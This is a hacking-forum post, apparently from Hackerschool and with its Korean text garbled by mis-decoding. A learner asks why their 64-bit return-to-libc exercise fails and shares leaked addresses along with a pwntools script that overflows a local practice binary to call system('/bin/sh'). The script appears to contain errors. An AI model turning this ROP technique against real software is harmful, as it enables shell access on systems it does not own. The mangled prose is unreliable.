22017, 1/1101 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   qw3709
   64bit RTL Áú¹®..

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Board&no=36248 [º¹»ç]


¿¬½ÀÁßÀε¥ À߾ȵdz׿©.. µµ¿ÍÁÖ¼¼¿©


system : 0x7ffff7a60510
/bin/sh : 0x7ffff7b9b3f3
pop_rdi_ret : 0x555555554793

payload´Â

sfp(dummy 8byte)+ret(pop_rdi_ret 8byte)+/bin/sh+system
ÀÔ´Ï´Ù.


from pwn import *

p = process('./bof64')

base = 0x7ffff7a1e000
system = base+0x42510
binsh = base+0x17d3f3
poprdi = base-0x2aaaa24c986d

print "system : "+hex(system)
print "/bin/sh : "+hex(binsh)
print "pop_rdi_ret : "+hex(poprdi)

exploit = "A"*264
exploit += p64(poprdi)
exploit += p64(binsh)
exploit += p64(system)

p.send(exploit)
p.interactive


ÆÄÀ̽ã ÄÚµåÀÔ´Ï´Ù...
À߸𸣰ڽÀ´Ï´Ù µµ¿ÍÁÖ¼¼¿ä
  Hit : 10028     Date : 2018/06/19 03:54


    
     [°øÁö]ÇØÄ¿½ºÄð ÀÌ¿ë¼öÄ¢ 2021/04/11 ¼öÁ¤ÆÇ [55] ÇѽÂÀç 01/05 12130
22016   ÇØÄ¿ ¼±»ý´ÔÀ» ã½À´Ï´Ù     dydy44
 04/29 153
22015   ...     ÇØÅ·ÀßÇÏ°í½Í´Ù
 03/31 289
22014   ...     ÇØÅ·ÀßÇÏ°í½Í´Ù
 03/25 300
22013   15³âÀüÂë ÀÌ »çÀÌÆ® º¸°í ²ÞÀ» Á¤Çß¾ú´Âµ¥~~~     ambition65
 03/20 474
22012   À¸¾Ó!!![1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 02/05 447
22011   A¤¿...     ÇØÅ·ÀßÇÏ°í½Í´Ù
 01/27 432
22010   ¿À·£¸¸~     DarkSlayer
 12/11 653
22009   ÇØÄ¿½ºÄð ¿¾³¯ BGM[1]     wkfhddl4041
 11/07 750
22008   È÷À×...     ÇØÅ·ÀßÇÏ°í½Í´Ù
 11/02 628
22007   ¹ÙµÏ°ú Àå±â     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/30 680
22006   ³ª´Â ¾ðÁ¦ ¾ÖÀÎÀÌ »ý±â³ª¿è...     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/27 744
22005   Àü±¹ 1À§     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/27 690
22004   ´ã¹è ¤»¤»[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/27 712
22003   ¸ÅÆ®¸¯½ºÀÇ ÆĶõ¾àÀ» ¾Æ½Ê´Ï±î..?     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/27 668
22002   ¤·¤·[1]     ÇØÅ·ÀßÇÏ°í½Í´Ù
 10/20 647
22001   ¿ÉÄ¡ ÇÙ°¨Áö ÇÁ·Î±×·¥Á» ¸¸µé¾îÁÖ¼¼¿ä[1]     powerima
 10/15 721
22000   ÇØÅ·ÆÀ¿ø ¸ðÁý[1]     koromoon
 08/27 1250
21999   °°ÀÌ ÇØÅ· ÆÀ ÀÌ·ç½ÇºÐ??     hacs98
 08/26 859
21998   ¾Æ........ ¤Ð¤Ð     ÇØÅ·ÀßÇÏ°í½Í´Ù
 08/04 1089
1 [2][3][4][5][6][7][8][9][10]..[1101]

Copyright 1999-2026 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org